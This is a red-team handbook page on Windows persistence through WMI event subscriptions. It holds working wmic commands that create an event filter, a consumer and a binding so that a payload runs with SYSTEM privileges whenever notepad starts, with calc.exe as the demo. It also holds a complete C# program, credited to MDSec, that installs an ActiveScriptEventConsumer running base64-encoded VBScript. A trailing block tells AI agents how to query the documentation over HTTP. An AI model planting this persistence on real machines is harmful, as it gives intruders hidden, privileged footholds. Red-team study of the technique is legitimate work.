# WMI Event Subscriptions

WMI Event subscriptions can be abused for persistence with payloads that will run with SYSTEM privileges. WMI eventing can be used on action to almost any system event, this includes: logins, registry, file activity etc.

There are 3 things to remember about WMI

1. EventFilter: Action that triggers the payload&#x20;
2. EventConsumer: Where the payload will be stored •
3. FilterToConsumerBinding: Binds the “EventFilter” and “EventConsumer”

This can be done with the wmic utility:&#x20;

```
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="INFilter", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="Select * From __InstanceCreationEvent Within 15 Where (TargetInstance Isa 'Win32_Process' And TargetInstance.Name = 'notepad.exe')"
```

The above command will kickoff if there is a instance of x32 notepad.exe in memory.&#x20;

```
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="NAME", ExecutablePath="C:\Windows\System32\calc.exe",CommandLineTemplate="C:\Windows\System32\calc.exe"
```

The above command is what to run if notepad.exe is executed.

```
wmic /NAMESPACE:"\root\subscription" PATH FilterToConsumerBinding CREATE Filter="EventFilter.Name=\"INFilter\"", Consumer="CommandLineEventConsumer.Name=\"NAME\""
```

The above command will bind the “EventFilter” and “EventConsumer” which will achieve persistence everytime an instance of a x32 notepad is executed.

If we run x32 notepad, we will see an instance of calc being ran with SYSTEM privileges.

We can also implement this in other languages like C#(stolen from mdsec)

```
// COMPLETELY STOLEN FROM HERE: https://github.com/mdsecactivebreach/WMIPersistence/blob/master/WMIPersist.cs
```

```
using System;
using System.Text;
using System.Management;

namespace WMIPersistence
{
    class Program
    {
        static void Main(string[] args)
        {
            PersistWMI();
        }

        static void PersistWMI()
        {
            ManagementObject myEventFilter = null;
            ManagementObject myEventConsumer = null;
            ManagementObject myBinder = null;

            string vbscript64 = "<INSIDE base64 encoded VBS here>";
            string vbscript = Encoding.UTF8.GetString(Convert.FromBase64String(vbscript64));
            try
            {
                ManagementScope scope = new ManagementScope(@"\\.\root\subscription");

                ManagementClass wmiEventFilter = new ManagementClass(scope, new
                ManagementPath("__EventFilter"), null);
                String strQuery = @"SELECT * FROM __InstanceCreationEvent WITHIN 5 " +            
        "WHERE TargetInstance ISA \"Win32_Process\" " +           
        "AND TargetInstance.Name = \"notepad.exe\"";

                WqlEventQuery myEventQuery = new WqlEventQuery(strQuery);
                myEventFilter = wmiEventFilter.CreateInstance();
                myEventFilter["Name"] = "demoEventFilter";
                myEventFilter["Query"] = myEventQuery.QueryString;
                myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage;
                myEventFilter["EventNameSpace"] = @"\root\cimv2";
                myEventFilter.Put();
                Console.WriteLine("[*] Event filter created.");

                myEventConsumer =
                new ManagementClass(scope, new ManagementPath("ActiveScriptEventConsumer"),
                null).CreateInstance();
                myEventConsumer["Name"] = "BadActiveScriptEventConsumer";
                myEventConsumer["ScriptingEngine"] = "VBScript";
                myEventConsumer["ScriptText"] = vbscript;
                myEventConsumer.Put();

                Console.WriteLine("[*] Event consumer created.");

                myBinder =
                new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"),
                null).CreateInstance();
                myBinder["Filter"] = myEventFilter.Path.RelativePath;
                myBinder["Consumer"] = myEventConsumer.Path.RelativePath;
                myBinder.Put();

                Console.WriteLine("[*] Subscription created");
            }
            catch (Exception e)
            {
                Console.WriteLine(e);
            } // END CATCH
            Console.ReadKey();
        } // END FUNC
    } // END CLASS
} // END NAMESPACE
```

## Resources

{% embed url="<https://pentestlab.blog/2020/01/21/persistence-wmi-event-subscription/>" %}

{% embed url="<https://github.com/mdsecactivebreach/WMIPersistence/blob/master/WMIPersist.cs>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kwcsec.gitbook.io/the-red-team-handbook/techniques/persistence/admin-level/wmi-event-subscriptions.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.